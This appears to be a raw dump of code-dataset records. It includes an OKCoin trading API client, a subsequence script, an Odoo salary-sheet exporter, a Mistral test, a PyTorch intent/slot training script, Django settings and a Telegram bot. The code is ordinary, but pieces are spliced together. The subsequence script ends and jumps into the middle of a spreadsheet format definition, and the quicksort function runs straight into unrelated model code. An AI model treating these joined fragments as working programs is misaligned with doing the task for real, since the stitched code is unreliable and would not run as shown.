ret.append(data) # 一定是 error_code\n i = end\n return ret\n\n #现货取消订单\n def cancel_order(self,symbol,order_id):\n \"\"\"\n @para order_id, sperated by ',', most 3 IDs one time\n @return {'error': '1072033', 'success': '10720260,10720334'} or {'order_id': 10717356, 'result': 
True}\n        \"\"\"\n        CANCEL_ORDER_RESOURCE = \"/api/v1/cancel_order.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'order_id':order_id\n        }\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,CANCEL_ORDER_RESOURCE,params)\n\n    # Withdraw coins\n    def withdraw(self,symbol,chargefee,trade_pwd,withdraw_address,withdraw_amount,target):\n        WITHDRAW = \"/api/v1/withdraw.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'chargefee':chargefee,\n            'trade_pwd':trade_pwd,\n            'withdraw_address':withdraw_address,\n            'withdraw_amount':withdraw_amount,\n            'target':target\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,WITHDRAW,params)\n\n    # Cancel a coin withdrawal\n    def cancel_withdraw(self,symbol,withdraw_id):\n        CANCEL_WITHDRAW = \"/api/v1/cancel_withdraw.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'withdraw_id':withdraw_id\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,CANCEL_WITHDRAW,params)\n\n    # Apply for a loan\n    def borrow_money(self,symbol,days,amount,rate,sign):\n        BORROW_MONEY=\"/api/v1/borrow_money.do\"\n        params = {\n            'api_key':self.__apikey,\n            'symbol':symbol,\n            'days':days,\n            'amount':amount,\n            'rate':rate\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,BORROW_MONEY,params)\n\n    # Cancel a loan\n    def cancel_borrow(self,borrow_id):\n        CANCEL_BORROW = \"/api/v1/cancel_borrow.do\"\n        params = {\n            'api_key':self.__apikey,\n            'borrow_id':borrow_id\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,CANCEL_BORROW,params)\n\n    # Repay a loan in full\n    def repayment(self,borrow_id):\n        REPAYMENT=\"/api/v1/repayment.do\"\n        params = {\n            'api_key':self.__apikey,\n            'borrow_id':borrow_id\n        }\n\n        params['sign'] = buildMySign(params,self.__secretkey)\n        return httpPost(self.__url,REPAYMENT,params)","sub_path":"btcTradingSystem/OKCoin/Code/codebase/OKCoinSpotAPI.py","file_name":"OKCoinSpotAPI.py","file_ext":"py","file_size_in_byte":15708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190797822","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nmylist = list(map(int,input().strip().split()))\ndp = [1 for i in range(n)]\n\nfor i in range(n):\n    for j in range(i):\n        if mylist[i] < mylist[j] and dp[i] <= dp[j]:\n            dp[i] = dp[j] + 1\n
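\n# Worked example (editor's addition): for input [3, 1, 2] the dp array becomes\n# [1, 2, 2] (longest strictly decreasing subsequences [3, 1] or [3, 2]), so the\n# program prints 2.\n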
'center',\n \"valign\": 'vcenter',\n \"font_color\":'white',\n \"bg_color\": '548235',\n 'font_size': '10',\n })\n\n # Create a format to use in the merged range.\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'font_size': '12',\n \"font_color\":'white',\n 'fg_color': '7030a0'})\n\n main_data = workbook.add_format({\n \"align\": 'center',\n \"valign\": 'vcenter',\n 'font_size': '8',\n })\n merge_format.set_shrink()\n main_heading.set_text_justlast(1)\n # main_data.set_border()\n worksheet = workbook.add_worksheet('Salary Sheet')\n\n head = \"Statement of salaries of employees for\" +' '+ str(self.batch.name)\n for row in range(1, 1):\n worksheet.set_row(row, 7)\n worksheet.merge_range('AA1:A1', head,merge_format)\n\n # worksheet.set_column('A:A', 10)\n # worksheet.set_column('G:G', 28)\n worksheet.set_column('B:B', 15)\n worksheet.set_column('W:AA', 15)\n worksheet.set_column('H:Q', 15)\n worksheet.write('AA2', 'Employee Name', main_heading)\n worksheet.write('Z2', 'Nationality', main_heading)\n worksheet.write('Y2', 'Job title',main_heading)\n worksheet.write('X2', 'Functional code',main_heading)\n worksheet.write('W2', 'Basic Salary',main_heading)\n worksheet.merge_range('U2:V2','Overtime',main_heading)\n worksheet.write('V3', 'Hour',main_heading)\n worksheet.write('U3', 'Time',main_heading)\n worksheet.merge_range('R2:T2','Absence',main_heading)\n worksheet.write('R3', 'Minute',main_heading)\n worksheet.write('S3', 'Hour',main_heading)\n worksheet.write('T3', 'Day',main_heading)\n worksheet.merge_range('H2:Q2','Allowances',main_heading)\n worksheet.write('H3', 'Total',main_heading)\n worksheet.write('I3', 'Overtime Amount',main_heading)\n worksheet.write('J3', 'Other',main_heading)\n worksheet.write('K3', 'Food',main_heading)\n worksheet.write('L3', 'Assignment',main_heading)\n worksheet.write('M3', 'Job of Title',main_heading)\n worksheet.write('N3', 'Telephone',main_heading)\n worksheet.write('O3', 'Housing',main_heading)\n worksheet.write('P3', 'Transportation',main_heading)\n worksheet.write('Q3', 'Basic Salary',main_heading)\n worksheet.merge_range('C2:G2','Deduction',main_heading)\n worksheet.write('C3', 'Total',main_heading)\n worksheet.write('D3', 'Other',main_heading)\n worksheet.write('E3', 'GOSI',main_heading)\n worksheet.write('F3', 'Absence',main_heading)\n worksheet.write('G3', 'Advance',main_heading)\n worksheet.write('B2', 'Net Receivable',main_heading)\n worksheet.write('A2', 'Notes',main_heading)\n\n\n row = 3\n col = 0\n records = input_records\n\n basic = 0\n trans = 0\n house = 0\n tele = 0\n job = 0\n assign = 0\n food = 0\n other = 0\n over = 0\n gosi = 0\n net = 0\n\n for x in records:\n # name = str(x.employee_id.name).encode('utf-8').strip()\n worksheet.write_string (row, col+26,'{0}'.decode('utf-8').format(x.employee_id.name),main_data)\n # worksheet.write_string (row, col+25,'{0}'.decode('utf-8').format(x.employee_id.ar_country_id),main_data)\n # worksheet.write_string (row, col+24,'{0}'.decode('utf-8').format(x.employee_id.ar_designation),main_data)\n # worksheet.write_string (row, col+23,'{0}'.decode('utf-8').format(x.employee_id.pin),main_data)\n def get_basic(attr):\n contract = self.env['hr.contract'].search([('employee_id.id','=',attr)],limit=1)\n\n return contract.wage\n\n def get_trans():\n trans = 0\n house = 0\n tele = 0\n job = 0\n assign = 0\n food = 0\n other = 0\n over = 0\n gosi = 0\n net = 0\n for y in x.line_ids:\n if y.code == 'Transportation Allowance Employee':\n trans = 
y.total\n if y.code == 'HouseRentAllowanceUnMaried' or y.code == 'HRAUNMARRIED01':\n house = y.total\n if y.code == 'Telephone Allowance' or y.code == 'Telephone Allowance 70SR':\n tele = y.total\n if y.code == 'Job Title Allowance':\n job = y.total\n if y.code == 'assign':\n assign = y.total\n if y.code == 'Food Allowance':\n food = y.total\n if y.code == 'other':\n other = y.total\n if y.code == 'overtime':\n over = y.total\n if y.code == 'EMPGOSI':\n gosi = y.total\n if y.code == 'NET':\n net = y.total\n\n\n return trans,house,tele,job,assign,food,other,over,gosi,net\n\n worksheet.write_string (row, col+22,str(get_basic(x.employee_id.id)),main_data)\n worksheet.write_string (row, col+15,str(get_trans()[0]),main_data)\n worksheet.write_string (row, col+14,str(get_trans()[1]),main_data)\n worksheet.write_string (row, col+13,str(get_trans()[2]),main_data)\n worksheet.write_string (row, col+12,str(get_trans()[3]),main_data)\n worksheet.write_string (row, col+11,str(get_trans()[4]),main_data)\n worksheet.write_string (row, col+10,str(get_trans()[5]),main_data)\n worksheet.write_string (row, col+9,str(get_trans()[6]),main_data)\n worksheet.write_string (row, col+8,str(get_trans()[7]),main_data)\n worksheet.write_string (row, col+4,str(get_trans()[8]),main_data)\n worksheet.write_string (row, col+4,str(get_trans()[8]),main_data)\n worksheet.write_string (row, col+1,str(get_trans()[9]),main_data)\n\n basic = basic + get_basic(x.employee_id.id)\n trans = trans + get_trans()[0]\n house = house + get_trans()[1]\n tele = tele + get_trans()[2]\n job = job + get_trans()[3]\n assign = assign + get_trans()[4]\n food = food + get_trans()[5]\n other = other + get_trans()[6]\n over = over + get_trans()[7]\n gosi = gosi + get_trans()[8]\n net = net + get_trans()[9]\n\n row += 1\n\n loc = 'X'+str(row+1)\n loc1 = 'AA'+str(row+1)\n end_loc = str(loc)+':'+str(loc1)\n worksheet.merge_range(str(end_loc), 'Total' ,main_heading)\n locw = 'W'+str(row+1)\n worksheet.write_string(str(locw),str(basic),main_heading)\n locp = 'P'+str(row+1)\n worksheet.write_string(str(locp),str(trans),main_heading)\n loco = 'O'+str(row+1)\n worksheet.write_string(str(loco),str(house),main_heading)\n locn = 'N'+str(row+1)\n worksheet.write_string(str(locn),str(tele),main_heading)\n locm = 'M'+str(row+1)\n worksheet.write_string(str(locm),str(job),main_heading)\n locl = 'L'+str(row+1)\n worksheet.write_string(str(locl),str(assign),main_heading)\n lock = 'K'+str(row+1)\n worksheet.write_string(str(lock),str(food),main_heading)\n locj = 'J'+str(row+1)\n worksheet.write_string(str(locj),str(other),main_heading)\n loci = 'I'+str(row+1)\n worksheet.write_string(str(loci),str(over),main_heading)\n loce = 'E'+str(row+1)\n worksheet.write_string(str(loce),str(gosi),main_heading)\n locb = 'B'+str(row+1)\n worksheet.write_string(str(locb),str(net),main_heading)\n\n loceo = 'C'+str(row+4)\n loceo1 = 'D'+str(row+4)\n end_loceo = str(loceo)+':'+str(loceo1)\n worksheet.merge_range(str(end_loceo), 'CEO' ,main_heading)\n locHR = 'H'+str(row+4)\n locHR1 = 'I'+str(row+4)\n end_locHR = str(locHR)+':'+str(locHR1)\n worksheet.merge_range(str(end_locHR), 'HR Management' ,main_heading)\n locR = 'R'+str(row+4)\n locT = 'T'+str(row+4)\n end_locRT = str(locR)+':'+str(locT)\n worksheet.merge_range(str(end_locRT), 'Financial Management' ,main_heading)\n locX = 'X'+str(row+4)\n locY = 'Y'+str(row+4)\n end_locXY = str(locX)+':'+str(locY)\n worksheet.merge_range(str(end_locXY), 'Preparing' ,main_heading)\n\n\n \n \n\n def get_report(self):\n self.print_report()\n 
data_file = open(config['data_dir'] + \"/salary_sheet.xlsx\", \"rb\")\n out = data_file.read()\n data_file.close()\n self.name = 'Salary Sheet' +' '+ self.batch.name + ' '+'.xlsx'\n self.file = base64.b64encode(out)\n return {\n \"type\": \"ir.actions.do_nothing\",\n }\n","sub_path":"salary_sheet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"80660342","text":"# Copyright 2014 - Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.actions.openstack.action_generator import generators\nfrom mistral.actions.openstack import actions\nfrom mistral.tests import base\n\n\nclass GlanceGeneratorTest(base.BaseTest):\n def test_generator(self):\n action_name = \"glance.images_list\"\n generator = generators.GlanceActionGenerator\n action_classes = generator.create_actions()\n action = self._assert_single_item(\n action_classes,\n name=action_name\n )\n\n self.assertIsNotNone(generator)\n self.assertTrue(issubclass(action['class'], actions.GlanceAction))\n self.assertEqual(\"images.list\", action['class'].client_method_name)\n","sub_path":"mistral/tests/unit/actions/openstack/test_glance_generator.py","file_name":"test_glance_generator.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"136516207","text":"\n# Quick sort\ndef quick_sort(li,start,end):\n mid=li[start]\n left=start\n right=end\n if start>=end:\n return\n while left< right:\n while left<right and li[right]>=mid:\n right-=1\n li[left]=li[right]\n while left<right and li[left]<=mid:\n left+=1\n li[right]=li[left]\n li[left]=mid\n quick_sort(li,start,left-1)\n quick_sort(li,left+1,end)\ndef initModel(WORDSIZE, SLOTSIZE, INTENTSIZE, isTrain=True):\n \"\"\"\n EncoderRNN、AttnIntent、DecoderIntent -> Seq2Intent\n EncoderRNN、AttnSlot、DecoderSlot -> Seq2Slot\n Seq2Intent、Seq2Slot -> Seq2Seq\n :return:\n \"\"\"\n encoder = EncoderRNN(input_size=WORDSIZE, emb_size=EMBEDDSIZE, pading_idx=WPAD_SIGN, hidden_size=LSTMHIDSIZE, n_layers=NLAYER, dropout=DROPOUT, bidirectional=BIDIRECTIONAL)\n\n attnIntent = AttnIntent()\n attnSlot = AttnSlot()\n\n decoderIntent = DecoderIntent(hidden_size=LSTMHIDSIZE * MULTI_HIDDEN, intent_size=INTENTSIZE)\n decoderSlot = DecoderSlot(hidden_size=LSTMHIDSIZE * MULTI_HIDDEN, slot_size=SLOTSIZE)\n\n crf = SlotCRF(num_tags=SLOTSIZE)\n\n seq2Intent = Seq2Intent(dec_intent=decoderIntent, attn_intent=attnIntent)\n seq2Slots = Seq2Slots(dec_slot=decoderSlot, attn_slot=attnSlot, crf=crf, hidden_size=LSTMHIDSIZE * MULTI_HIDDEN)\n\n model = Seq2Seq(encoder=encoder, seq2Intent=seq2Intent, seq2Slots=seq2Slots)\n model = model.cuda() if torch.cuda.is_available() else model\n if isTrain:\n model.apply(init_weights)\n return model\n\n\n\"\"\" 设定模型优化器 \"\"\"\ndef initOptimize(model):\n return optim.Adam(model.parameters(), lr=LEARNINGRATE)\n\n\"\"\" 设定损失函数 \"\"\"\ndef initLossFunction(PAD_IDX=-100):\n return nn.CrossEntropyLoss(ignore_index=PAD_IDX)\n\n\"\"\" 训练 \"\"\"\ndef train(iter, model=None, optimizer=None, isTrainSlot=True, isTrainIntent=True):\n ''' 读取数据 '''\n dataSeqIn, dataSeqOut, dataIntent = getData(trainDir) # 获取原数据\n dictWord = 
getWordDictionary(dataSeqIn) # 获取词典 (word2index, index2word)\n dictSlot = getSlotDictionary(dataSeqOut) # 获取词槽标签字典 (slot2index, index2slot)\n dictIntent = getIntentDictionary(dataIntent) # 获取意图标签字典 (intent2index, index2intent)\n pairs = makePairs(dataSeqIn, dataSeqOut, dataIntent) # 根据原数据生成样例对 zip(dataSeqIn, dataSeqOut, dataIntent)\n pairsIded = transIds(pairs, dictWord[0], dictSlot[0], dictIntent[0]) # 将字词都转换为数字id\n # pairsIdedPaded = pad(pairsIded) # 对数据进行pad填充与长度裁剪\n trainIterator = splitData(pairsIded) # 讲样例集按BATCHSIZE大小切分成多个块\n trainIterator = trainIterator[:len(trainIterator) - len(trainIterator) // 10]\n\n ''' 设定字典大小参数 '''\n WORDSIZE = len(dictWord[0])\n SLOTSIZE = len(dictSlot[0])\n INTENTSIZE = len(dictIntent[0])\n\n ''' 定义模型、优化器、损失函数 '''\n model = initModel(WORDSIZE, SLOTSIZE, INTENTSIZE) if model == None else model # 初始化并返回模型\n\n optimizer = initOptimize(model) if optimizer == None else optimizer # 初始化并返回优化器\n criterionIntent = initLossFunction() # 初始化并返回损失函数 -- 意图\n criterionSlot = initLossFunction(SPAD_SIGN) # 初始化并返回损失函数 -- 词槽\n\n ''' 模型训练 '''\n model.train() # 设定模型状态为训练状态\n epoch_lossIntent = 0 # 定义总损失\n epoch_lossSlot = 0\n epoch_lossCRF = 0\n for epoch, batch in tqdm.tqdm(enumerate(trainIterator)):\n MAXLEN = getMaxLengthFromBatch(batch, ADDLENGTH)\n lLensSeqin = getSeqInLengthsFromBatch(batch, ADDLENGTH, MAXLEN=MAXLEN)\n batch = padBatch(batch, ADDLENGTH, MAXLEN_TEMP=MAXLEN) # 按照一个batch一个batch的进行pad\n BatchSeqIn = batch[0] # 文本序列\n BatchSeqOut = batch[1] # 词槽标签序列\n BatchIntent = batch[2] # 意图标签\n BatchSeqIn, BatchSeqOut, BatchIntent = vector2Tensor(BatchSeqIn, BatchSeqOut, BatchIntent)\n\n optimizer.zero_grad()\n\n outputs, slot_crf = model(seqIn=BatchSeqIn, seqOut=BatchSeqOut, lLensSeqin=lLensSeqin)\n outputIntent = outputs[0]\n outputSlots = outputs[1]\n\n BatchSeqOut = BatchSeqOut.view(BatchSeqOut.size(0) * BatchSeqOut.size(1))\n outputSlots = outputSlots.view(outputSlots.size(0) * outputSlots.size(1), SLOTSIZE)\n\n lossIntent = criterionIntent(outputIntent, BatchIntent)\n lossSlot = criterionSlot(outputSlots, BatchSeqOut)\n\n loss = lossIntent * 0\n loss = loss + lossIntent if isTrainIntent == True else loss\n loss = loss + lossSlot if isTrainSlot == True else loss\n loss = loss - slot_crf / BATCHSIZE\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), CLIP)\n optimizer.step()\n\n epoch_lossIntent += lossIntent.item()\n epoch_lossSlot += lossSlot.item()\n epoch_lossCRF -= slot_crf.item()\n # import time\n # time.sleep(0.4)\n # print(\"iter=%d, epoch=%d / %d: MAXLEN = %d; trainLoss = %f、 intentLoss = %f、 slotLoss = %f、crfLoss = %f \" % (iter, epoch, len(trainIterator), MAXLEN, loss.item(), lossIntent, lossSlot, -slot_crf))\n\n return (epoch_lossIntent / len(trainIterator), epoch_lossSlot / len(trainIterator), epoch_lossCRF / len(trainIterator)), model, optimizer, (dictWord, dictSlot, dictIntent)\n\ndef evaluate(model, dicts):\n\n ''' 读取数据 '''\n dataSeqIn, dataSeqOut, dataIntent = getData(validDir) # 获取原数据\n dictWord = dicts[0] # 获取词典 (word2index, index2word)\n dictSlot = dicts[1] # 获取词槽标签字典 (slot2index, index2slot)\n dictIntent = dicts[2] # 获取意图标签字典 (label2index, index2label)\n pairs = makePairs(dataSeqIn, dataSeqOut, dataIntent) # 根据原数据生成样例对 zip(dataSeqIn, dataSeqOut, dataIntent)\n pairsIded = transIds(pairs, dictWord[0], dictSlot[0], dictIntent[0]) # 将字词都转换为数字id\n\n validIterator = splitData(pairsIded) # 讲样例集按BATCHSIZE大小切分成多个块\n\n ''' 设定字典大小参数 '''\n WORDSIZE = len(dictWord[0])\n SLOTSIZE = len(dictSlot[0])\n INTENTSIZE = len(dictIntent[0])\n\n 
criterionIntent = initLossFunction() # 初始化并返回损失函数 -- 意图\n criterionSlot = initLossFunction(SPAD_SIGN) # 初始化并返回损失函数 -- 词槽\n ''' 模型验证 '''\n model.eval()\n epoch_lossIntent = 0\n epoch_lossSlot = 0\n epoch_lossCRF = 0\n with torch.no_grad():\n for i, batch in enumerate(validIterator):\n MAXLEN = getMaxLengthFromBatch(batch, ADDLENGTH)\n lLensSeqin = getSeqInLengthsFromBatch(batch, ADDLENGTH, MAXLEN=MAXLEN)\n batch = padBatch(batch, ADDLENGTH, MAXLEN_TEMP=MAXLEN) # 按照一个batch一个batch的进行pad\n BatchSeqIn = batch[0] # 文本序列\n BatchSeqOut = batch[1] # 词槽标签序列\n BatchIntent = batch[2] # 意图标签\n BatchSeqIn, BatchSeqOut, BatchIntent = vector2Tensor(BatchSeqIn, BatchSeqOut, BatchIntent)\n\n outputs, slot_crf = model(seqIn=BatchSeqIn, seqOut=BatchSeqOut, lLensSeqin=lLensSeqin)\n outputIntent = outputs[0]\n outputSlots = outputs[1]\n\n BatchSeqOut = BatchSeqOut.view(BatchSeqOut.size(0) * BatchSeqOut.size(1))\n outputSlots = outputSlots.view(outputSlots.size(0) * outputSlots.size(1), SLOTSIZE)\n\n lossIntent = criterionIntent(outputIntent, BatchIntent)\n lossSlot = criterionSlot(outputSlots, BatchSeqOut)\n\n epoch_lossIntent += lossIntent.item()\n epoch_lossSlot += lossSlot.item()\n epoch_lossCRF -= slot_crf.item()\n return (epoch_lossIntent / len(validIterator), epoch_lossSlot / len(validIterator), epoch_lossCRF / len(validIterator))\n\n\nif __name__ == '__main__':\n modelBest = None\n model = None\n optimizer = None\n lossMin = 100\n\n for iter in range(TRAINITER):\n trainLoss, model, optimizer, dicts = train(iter, model=model, optimizer=optimizer, isTrainIntent=True, isTrainSlot=True)\n\n validLoss = evaluate(model, dicts)\n print(\"iter %d / %d: trainLoss = (intent=%f, slot=%f, crf=%f), validLoss = (intent=%f, slot=%f, crf=%f)\" %\n (iter, TRAINITER, trainLoss[0], trainLoss[1], trainLoss[2], validLoss[0], validLoss[1], validLoss[2]))\n\n\n if validLoss[2] < lossMin:\n lossMin = validLoss[2]\n modelBest = model\n save_model(modelBest, dicts, modelDir + \"/crf\", \"crf.model\", \"crf.json\")\n test()","sub_path":"SimpleQA/crf/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122544724","text":"import environ\nfrom unipath import Path\n\nROOT_DIR = Path(__file__).ancestor(3)\nAPPS_DIR = ROOT_DIR.child('apps')\nenv = environ.Env(DEBUG=(bool, False),)\nenviron.Env.read_env('../.env')\n\nSECRET_KEY = env('DJANGO_SECRET_KEY')\nDEBUG = env.bool('DJANGO_DEBUG', default=False)\nADMINS = (\n (env.str('DJANGO_ADMIN_NAME'), env.str('DJANGO_ADMIN_MAIL')),\n)\nMANAGERS = ADMINS\n\n# Apps\nADMIN_DASHBOARD = []\nDJANGO_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\nTHIRD_PARTY_APPS = [\n 'social_django',\n 'corsheaders',\n 'graphene_django',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'djoser'\n]\nLOCAL_APPS = [\n 'apps.commons.config.CommonsConfig',\n 'apps.profiles.config.ProfilesConfig',\n 'apps.capine.config.CapineConfig',\n 'apps.productividad.config.ProductividadConfig',\n 'apps.ccc.config.CccConfig',\n 'apps.encuestas.config.EncuestasConfig'\n]\nINSTALLED_APPS = ADMIN_DASHBOARD + DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# Otras configuraciones\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 
'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'spa.middleware.SPAMiddleware',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n APPS_DIR.child('templates')\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nROOT_URLCONF = 'core.urls'\nWSGI_APPLICATION = 'core.wsgi.application'\n\nDATABASES = {\n 'default': env.db('DATABASE_URL'),\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n\nLANGUAGE_CODE = 'es'\nTIME_ZONE = 'Mexico/General'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nSITE_ID = 1\n\nSTATIC_ROOT = APPS_DIR.child('assets')\nSTATIC_URL = '/assets/'\nSTATICFILES_DIRS = (\n str(APPS_DIR.child('static')),\n)\n\nMEDIA_ROOT = APPS_DIR.child('media')\nMEDIA_URL = '/media/'\n\nGRAPHENE = {\n 'schema': 'core.schema.schema',\n}\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = env('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = env('EMAIL_HOST_PASSWORD')\nEMAIL_PORT = 587\n","sub_path":"src/core/config/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"21674537","text":"import time\nimport telegram\nfrom telegram import KeyboardButton, ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton, User\nfrom Erie.core.core import Core\nfrom Erie.database.worker import Worker\n\ndef GetDataInUpdater(updater):\n result = {\n \"chat_id\": None,\n \"msg_id\": None,\n \"msg_text\": None,\n \"user_id\": None,\n \"username\": None,\n \"firstname\": None,\n \"lang\": None\n }\n\n if updater.message is not None:\n result[\"chat_id\"] = updater.message.chat_id\n result[\"msg_id\"] = updater.message.message_id\n result[\"msg_text\"] = updater.message.text\n result[\"user_id\"] = updater.message.from_user.id\n result[\"username\"] = updater.message.from_user.username\n result[\"firstname\"] = updater.message.from_user.first_name\n result[\"lang\"] = updater.message.from_user.language_code\n else:\n result[\"chat_id\"] = updater.callback_query.message.chat_id\n result[\"msg_id\"] = updater.callback_query.message.message_id\n result[\"msg_text\"] = updater.callback_query.message.text\n result[\"user_id\"] = updater.callback_query.from_user.id\n result[\"username\"] = updater.callback_query.from_user.username\n result[\"firstname\"] = updater.callback_query.from_user.first_name\n result[\"lang\"] = updater.callback_query.from_user.language_code\n\n return result\n\ndef GetStateUser(userId):\n return Worker(\"tg\").GetUserStateFromId(userId)\n\ndef SetStateUser(userId, value):\n return Worker(\"tg\").SetUserStateFromId(userId, value)\n\ndef Start(updater, context):\n data = GetDataInUpdater(updater)\n\n stiсker_data = \"\"\n text_data = \"\"\n text_set_lang = \"\"\n btns = []\n\n if Worker(\"tg\").AddUser(data[\"user_id\"], data[\"firstname\"], data[\"username\"]) == 1:\n localizationType = 
Core.GetLocalizationTypes()\n\n for key in localizationType.keys():\n btns.append(InlineKeyboardButton(text=localizationType[key], callback_data=key))\n\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Hello\")\n text_data = Core.GetRandomLocalizationString(\"ru_ru\", \"FirstEntry\")\n text_set_lang = Core.GetRandomLocalizationString(\"ru_ru\", \"SetLang\")\n else:\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n desired_name = Worker(\"tg\").GerDesiredName(data[\"user_id\"])\n\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Hello\")\n text_data = Core.GetRandomLocalizationString(locate, \"Hello\").format(desired_name)\n\n\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n\n context.bot.send_message(text=text_data, chat_id=data[\"chat_id\"])\n\n if len(btns) > 0:\n context.bot.send_message(text=text_set_lang, chat_id=data[\"chat_id\"], reply_markup=InlineKeyboardMarkup([btns]))\n else:\n AddProductsButtonsInBusket(updater, context)\n\n\ndef AnsverForText(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n source = Core.GetLocalizationAnsverType(locate)\n desired_name = Worker(\"tg\").GerDesiredName(data[\"user_id\"])\n stiсker_data = \"\"\n msg_text = \"\"\n\n # Temp code\n if Core.GetRandomLocalizationString(locate, \"StartOrder\") == data[\"msg_text\"]:\n GetProductsFromUser(updater, context, \"types\")\n return\n if Core.GetRandomLocalizationString(locate, \"HistoryOrder\") == data[\"msg_text\"]:\n GetOrders(updater, context)\n return\n\n # Dance)\n if data[\"msg_text\"] in source[\"Question\"][0]:\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Dance\")\n audio = {\"audio\": Core.GetVoiceAndMusicInSource(\"\")}\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=\"Тут должна быть музыка\", file=audio)\n return\n\n for i in range(0, len(source[\"Question\"])):\n if data[\"msg_text\"] in source[\"Question\"][i]:\n ansver_data = Core.GetRandomLocalizationAnsver(locate, i)\n msg_text = ansver_data[0].format(desired_name)\n stiсker_name = ansver_data[1]\n\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(2)\n if stiсker_name != \"\":\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", stiсker_name)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n return\n\n msg_text = Core.GetRandomLocalizationString(locate, \"ErrorUnderstandMsg\")\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Whot\")\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n\n time.sleep(2)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef AnsverForRestType(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n text_data = Core.GetRandomLocalizationString(locate, \"DontAnderstandThisTypeMsg\")\n stiсker_data = Core.GetSource(\"telegram_stiсkers_data\", \"Whot\")\n\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(1)\n context.bot.send_sticker(chat_id=data[\"chat_id\"], sticker=stiсker_data)\n context.bot.send_message(chat_id=data[\"chat_id\"], 
